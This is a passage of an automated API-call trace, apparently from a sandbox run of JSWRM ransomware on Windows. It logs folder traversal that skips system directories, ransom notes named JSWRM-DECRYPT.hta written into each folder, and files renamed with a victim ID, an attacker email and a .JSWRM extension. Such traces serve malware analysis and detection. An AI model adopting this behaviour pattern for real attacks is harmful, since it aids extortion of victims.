(lpString1="LanguageModel", lpString2="recovery") returned -1 [0068.569] lstrcmpiW (lpString1="LanguageModel", lpString2="perflogs") returned -1 [0068.569] lstrcmpiW (lpString1="LanguageModel", lpString2="documents and settings") returned 1 [0068.569] lstrcmpiW (lpString1="LanguageModel", lpString2="$RECYCLE.BIN") returned 1 [0068.569] lstrcmpiW (lpString1="LanguageModel", lpString2="system volume information") returned -1 [0068.569] lstrcmpiW (lpString1="LanguageModel", lpString2="msocache") returned -1 [0068.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.570] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\jswrm-decrypt.hta")) returned 0xffffffff [0068.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0068.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0068.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.570] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.571] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.571] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.572] CloseHandle (hObject=0x454) returned 1 [0068.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0068.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1fc808 [0068.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x21fab8 [0068.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.572] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\jswrm-decrypt.hta")) returned 0x20 [0068.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0068.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0068.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0068.572] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076afd8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f8899a8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232040 [0068.572] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.573] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076afd8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f8899a8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.573] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.573] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.573] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="chstic.dgml", cAlternateFileName="")) returned 1 [0068.573] lstrcmpiW (lpString1="chstic.dgml", lpString2=".") returned 1 [0068.573] lstrcmpiW (lpString1="chstic.dgml", lpString2="..") returned 1 [0068.573] lstrcmpiW (lpString1="chstic.dgml", lpString2="...") returned 1 [0068.573] lstrcmpiW (lpString1="chstic.dgml", lpString2="windows") returned -1 [0068.573] lstrcmpiW (lpString1="chstic.dgml", lpString2="recovery") returned -1 [0068.573] lstrcmpiW (lpString1="chstic.dgml", lpString2="perflogs") returned -1 [0068.573] lstrcmpiW (lpString1="chstic.dgml", lpString2="documents and settings") returned -1 [0068.573] lstrcmpiW (lpString1="chstic.dgml", lpString2="$RECYCLE.BIN") returned 1 [0068.573] lstrcmpiW (lpString1="chstic.dgml", lpString2="system volume information") returned -1 [0068.573] lstrcmpiW (lpString1="chstic.dgml", lpString2="msocache") returned -1 [0068.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0068.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chstic.dgml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chstic.dgml", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="chstic.dgml", lpUsedDefaultChar=0x0) returned 11 [0068.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0068.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chstic.dgml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chstic.dgml", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="chstic.dgml", lpUsedDefaultChar=0x0) returned 11 [0068.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0068.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0068.573] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\chstic.dgml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.574] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10091798758413952) returned 0 [0068.574] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.574] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.574] CloseHandle (hObject=0xffffffff) returned 1 [0068.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0068.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0068.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0068.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0068.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0068.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0068.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.575] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\chstic.dgml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\chstic.dgml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0068.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0068.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0068.575] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8899a8, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f8899a8, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f8899a8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.575] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.575] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.575] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.575] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.575] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.575] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.575] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.575] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.575] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.575] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0068.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0068.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.576] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8899a8, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f8899a8, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f8899a8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0068.576] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0068.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0068.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.576] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076b52b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0068.576] lstrcmpiW (lpString1="lt-LT", lpString2=".") returned 1 [0068.576] lstrcmpiW (lpString1="lt-LT", lpString2="..") returned 1 [0068.576] lstrcmpiW (lpString1="lt-LT", lpString2="...") returned 1 [0068.576] lstrcmpiW (lpString1="lt-LT", lpString2="windows") returned -1 [0068.576] lstrcmpiW (lpString1="lt-LT", lpString2="recovery") returned -1 [0068.576] lstrcmpiW (lpString1="lt-LT", lpString2="perflogs") returned -1 [0068.576] lstrcmpiW (lpString1="lt-LT", lpString2="documents and settings") returned 1 [0068.576] lstrcmpiW (lpString1="lt-LT", lpString2="$RECYCLE.BIN") returned 1 [0068.576] lstrcmpiW (lpString1="lt-LT", lpString2="system volume information") returned -1 [0068.576] lstrcmpiW (lpString1="lt-LT", lpString2="msocache") returned -1 [0068.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0068.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.576] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\jswrm-decrypt.hta")) returned 0xffffffff [0068.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0068.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0068.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0068.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0068.577] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.577] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.577] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.578] CloseHandle (hObject=0x454) returned 1 [0068.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0068.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0068.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0068.580] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\jswrm-decrypt.hta")) returned 0x20 [0068.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0068.580] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076b52b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f8899a8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0068.580] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.580] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076b52b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f8899a8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.581] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.581] lstrcmpiW (lpString1="..", lpString2="..") returned 0 